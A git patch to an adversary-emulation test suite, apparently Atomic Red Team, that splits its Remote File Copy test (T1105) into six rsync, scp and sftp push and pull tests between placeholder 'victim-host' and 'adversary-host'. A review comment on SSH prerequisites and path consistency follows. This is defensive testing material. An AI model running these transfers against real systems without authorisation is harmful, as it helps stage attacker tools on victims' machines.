From cbb425bdc7f1ba84013f53e0e8b41a758c3e0494 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Fri, 26 Oct 2018 12:59:47 -0600 Subject: [PATCH] Fixed T1105 test --- atomics/T1105/T1105.yaml | 185 ++++++++++++++++++++++++++++++++------- 1 file changed, 155 insertions(+), 30 deletions(-) diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 431ba313..b5f0ec68 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml 
@@ -3,45 +3,170 @@ attack_technique: T1105 display_name: Remote File Copy atomic_tests: -- name: rsync - scp - sftp remote file copy +- name: rsync remote file copy (push) description: | - Utilize rsync, scp and sftp to perform a remote file copy + Utilize rsync to perform a remote file copy (push) supported_platforms: - linux - macos + input_arguments: + local_path: + description: Path of folder to copy + type: Path + default: /tmp/adversary-rsync/ + username: + description: User account to authenticate on remote host + type: String + default: victim + remote_host: + description: Remote host to copy toward + type: String + default: victim-host + remote_path: + description: Remote path to receive rsync + type: Path + default: /tmp/victim-files executor: name: bash command: | - ### TODO: Not sure how to handle commands that need to be run on multiple systems + rsync -r #{local_path} #{username}@#{remote_host}:#{remote_path} - # Adversary System Configuration - # Ensure SSH access has been configured for an adversary account - echo "This file transferred by scp" > /tmp/adversary-scp - echo "This file transferred by sftp" > /tmp/adversary-sftp - mkdir /tmp/adversary-rsync - cd /tmp/adversary-rsync - touch a b c d e f g +- name: rsync remote file copy (pull) + description: | + Utilize rsync to perform a remote file copy (pull) + supported_platforms: + - linux + - macos + input_arguments: + remote_path: + description: Path of folder to copy + type: Path + default: /tmp/adversary-rsync/ + username: + description: User account to authenticate on remote host + type: String + default: adversary + remote_host: + description: Remote host to copy from + type: String + default: adversary-host + local_path: + description: Local path to receive rsync + type: Path + default: /tmp/victim-files + executor: + name: bash + command: | + rsync -r #{username}@#{remote_host}:#{remote_path} #{local_path} - # Victim System Configuration - # Ensure SSH access has been configured for a victim 
account - # Ensure write access for victim account to this directory - mkdir /tmp/victim-files - cd /tmp/victim-files +- name: scp remote file copy (push) + description: | + Utilize scp to perform a remote file copy (push) + supported_platforms: + - linux + - macos + input_arguments: + local_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-scp + username: + description: User account to authenticate on remote host + type: String + default: victim + remote_host: + description: Remote host to copy toward + type: String + default: victim-host + remote_path: + description: Remote path to receive scp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + scp #{local_file} #{username}@#{remote_host}:#{remote_path} - # Push files to victim using rsync - rsync -r /tmp/adversary-rsync/ victim@victim-host:/tmp/victim-files/ +- name: scp remote file copy (pull) + description: | + Utilize scp to perform a remote file copy (pull) + supported_platforms: + - linux + - macos + input_arguments: + remote_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-scp + username: + description: User account to authenticate on remote host + type: String + default: adversary + remote_host: + description: Remote host to copy from + type: String + default: adversary-host + local_path: + description: Local path to receive scp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + scp #{username}@#{remote_host}:#{remote_file} #{local_path} - # Pull files from adversary using rsync - rsync -r adversary@adversary-host:/tmp/adversary-rsync/ /tmp/victim-files/ +- name: sftp remote file copy (push) + description: | + Utilize sftp to perform a remote file copy (push) + supported_platforms: + - linux + - macos + input_arguments: + local_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-sftp + username: + description: User account to authenticate on remote host 
+ type: String + default: victim + remote_host: + description: Remote host to copy toward + type: String + default: victim-host + remote_path: + description: Remote path to receive sftp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + sftp #{username}@#{remote_host}:#{remote_path} <<< $'put #{local_file}' - # Push files to victim using scp - scp /tmp/adversary-scp victim@victim-host:/tmp/victim-files/ - - # Pull file from adversary using scp - scp adversary@adversary-host:/tmp/adversary-scp /tmp/victim-files/scp-file - - # Push files to victim using sftp - sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp' - - # Pull file from adversary using sftp - sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file +- name: sftp remote file copy (pull) + description: | + Utilize sftp to perform a remote file copy (pull) + supported_platforms: + - linux + - macos + input_arguments: + remote_file: + description: Path of file to copy + type: Path + default: /tmp/adversary-sftp + username: + description: User account to authenticate on remote host + type: String + default: adversary + remote_host: + description: Remote host to copy from + type: String + default: adversary-host + local_path: + description: Local path to receive sftp + type: Path + default: /tmp/victim-files/ + executor: + name: bash + command: | + sftp #{username}@#{remote_host}:#{remote_file} #{local_path}
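Review bot: Every new executor command (the rsync, scp and sftp lines in all six tests) will block on an interactive password prompt when key-based SSH to `#{remote_host}` is not already configured, and the hunk drops the old "Ensure SSH access has been configured" setup notes without carrying that prerequisite into the new descriptions. I would state it in each `description`, e.g. "Requires non-interactive (key-based) SSH access for #{username} on #{remote_host}; the source path must already exist.", and make the commands fail fast instead of hanging with `scp -o BatchMode=yes #{local_file} #{username}@#{remote_host}:#{remote_path}` and `rsync -r -e 'ssh -o BatchMode=yes' #{local_path} #{username}@#{remote_host}:#{remote_path}` (same for the pull and sftp variants). The defaults are also slightly inconsistent: the rsync tests use `/tmp/victim-files` while the scp and sftp tests use `/tmp/victim-files/`, which matters for rsync's trailing-slash copy semantics, so I would pick one form for all six. The removed setup also created the default source files (`/tmp/adversary-scp`, `/tmp/adversary-sftp`, `/tmp/adversary-rsync`); since nothing in the new tests creates them, the descriptions should say they are expected to exist.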